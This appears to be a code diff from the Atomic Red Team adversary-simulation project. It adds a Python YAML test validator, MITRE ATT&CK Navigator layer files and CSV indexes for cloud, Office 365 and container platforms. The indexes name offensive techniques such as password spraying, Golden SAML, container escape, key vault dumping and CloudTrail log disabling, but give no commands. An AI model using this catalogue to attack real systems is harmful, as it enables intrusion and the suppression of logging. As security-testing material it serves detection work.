+        """Validates whether the defined input args are used."""
+        with open(file.path, "r") as f:
+            atomic = yaml.load(f)
+            technique = Technique(**atomic)
+            for index, t in enumerate(technique.atomic_tests):
+                if t.auto_generated_guid:
+                    if t.auto_generated_guid not in self.guids:
+                        self.guids.append(t.auto_generated_guid)
+                    else:
+                        raise ValidationError.from_exception_data(
+                            "ValueError",
+                            [
+                                InitErrorDetails(
+                                    type=PydanticCustomError(
+                                        "reused_guid",
+                                        f"GUID {t.auto_generated_guid} reused for test {t.name}. GUIDs are auto generated. You can remove atomic_tests[{index}].auto_generated_guid",
+                                    ),
+                                    loc=("atomic_tests", index, "auto_generated_guid"),
+                                    input=t.auto_generated_guid,
+                                )
+                            ],
+                        )
+
+    def validate_yaml_extension(self, file: DirEntry):
+        """Validates the yaml extension"""
+        if fnmatch.fnmatch(file.path, "*.yml"):
+            raise ValidationError.from_exception_data(
+                "ValueError",
+                [
+                    InitErrorDetails(
+                        type=PydanticCustomError(
+                            "invalid_filename",
+                            "Rename file from .yml to .yaml",
+                        ),
+                        loc=["filename"],
+                    )
+                ],
+            )
+
+    def validate_directory(self, directory: DirEntry):
+        """Performs directory validation"""
+        self.validate_directory_path(directory)
+
+    def validate_directory_path(self, directory: DirEntry):
+        """Validated whether the directory is allowed directory name (`src` or `bin`)"""
+        if directory.name not in ["src", "bin"]:
+            raise ValidationError.from_exception_data(
+                "ValueError",
+                [
+                    InitErrorDetails(
+                        type=PydanticCustomError(
+                            "invalid_directory",
+                            "Invalid path. `src` and `bin` are the only two directories supported.",
+                        ),
+                        loc=["directory"],
+                    )
+                ],
+            )

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json

@@ -0,0 +1 @@
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json

@@ -0,0 +1 @@
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-esxi.json

@@ -0,0 +1 @@
+{"name":"Atomic Red Team (ESXi)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (ESXi) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json

@@ -0,0 +1 @@
+{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json

@@ -0,0 +1 @@
+{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":7,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n- AWS - Config Logs Disabled\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create Snapshot from EBS Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json

@@ -0,0 +1 @@
+{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json

@@ -0,0 +1 @@
+{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- GCP - Create Snapshot from Persistent Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json

@@ -0,0 +1 @@
+{"name":"Atomic Red Team (Office-365)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]}]}

atomics/Indexes/Indexes-CSV/azure-ad-index.csv

@@ -0,0 +1 @@
+Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name

atomics/Indexes/Indexes-CSV/containers-index.csv

@@ -0,0 +1,21 @@
+Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
+discovery,T1613,Container and Resource Discovery,1,Docker Container and Resource Discovery,ea2255df-d781-493b-9693-ac328f9afc3f,sh
+discovery,T1613,Container and Resource Discovery,2,Podman Container and Resource Discovery,fc631702-3f03-4f2b-8d8a-6b3d055580a1,sh
+discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
+credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
+credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
+persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
+persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
+persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
+privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
+privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
+privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
+privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
+privilege-escalation,T1611,Escape to Host,3,Privilege Escalation via Docker Volume Mapping,39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4,sh
+execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
+execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
+execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
+execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
+execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
+defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
+defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh